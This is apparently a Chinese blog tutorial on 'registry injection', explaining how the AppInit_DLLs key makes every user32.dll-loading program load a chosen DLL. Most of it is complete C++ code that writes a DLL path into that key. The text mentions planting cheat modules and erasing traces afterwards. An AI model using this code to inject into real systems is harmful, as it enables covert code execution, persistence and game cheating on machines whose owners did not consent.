注入(1)--注册表注入

在Windows NT/2000/XP/3000操作系统中,当需要加载user32.dll的程序启动时,user32.dll会加载注册表键HKEY_LOCAL_MACHINE\Software\Microsoft\windowsNT\CurrentVresion\Windows\AppInit_Dlls下边列出的所有模块,所以,可以将外挂模块写在AppInit_Dlls键下,待程序启动后,再将痕迹清除
注:系统需要重启后才能实现

// Reginject.cpp : 定义控制台应用程序的入口点。
//

#include "stdafx.h"
#include <Windows.h>

#define DSTKEY "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows"
BOOL RegInject(char* DllFullPath);
int _tmain(int argc, _TCHAR* argv[])
{
	char DllFullPath[MAX_PATH] = "D:\\Hook.dll";
	BOOL bOk = RegInject(DllFullPath);
	if (bOk)
	{
		printf("/n Registry inject success!\n");
	}
	else
	{
		printf("/n Registry inject fail!\n");
	}
	getchar();
	getchar();
	return 0;
}


//
//利用AppInit_Dlls键值会被user32.dll调用LoadLibrary所加载
//
BOOL RegInject(char* DllFullPath)
{

	BOOL bOk = FALSE; 
	HKEY hKey = NULL;
	LONG Return;
	BYTE cDllPath[MAX_PATH] = {0};


	OutputDebugString("[!] RegInject Enter...");
	Return = RegOpenKeyEx(
		HKEY_LOCAL_MACHINE, 
		DSTKEY, 
		0, 
		KEY_ALL_ACCESS,
		&hKey);

	if(Return != ERROR_SUCCESS)
	{
		OutputDebugString("[-] RegOpenKeyEx Error!\n");
		goto Exit;
	}

	memcpy((void*)cDllPath, DllFullPath, strlen(DllFullPath)+1);

	Return = RegSetValueEx(
		hKey,
		"AppInit_DLLs",
		0,
		REG_SZ,
		cDllPath,
		strlen((char*)cDllPath)+1
		);

	if(Return != ERROR_SUCCESS)
	{
		OutputDebugString("[-] RegSetKeyValue Error!\n");
		goto Exit;
	}

	OutputDebugString("[!] RegInject Exit...");
	bOk = TRUE;
Exit:
	if(hKey)
		RegCloseKey(hKey);
	return bOk;

}


posted @ 2016-10-02 00:05  Toring  阅读(343)  评论(0编辑  收藏  举报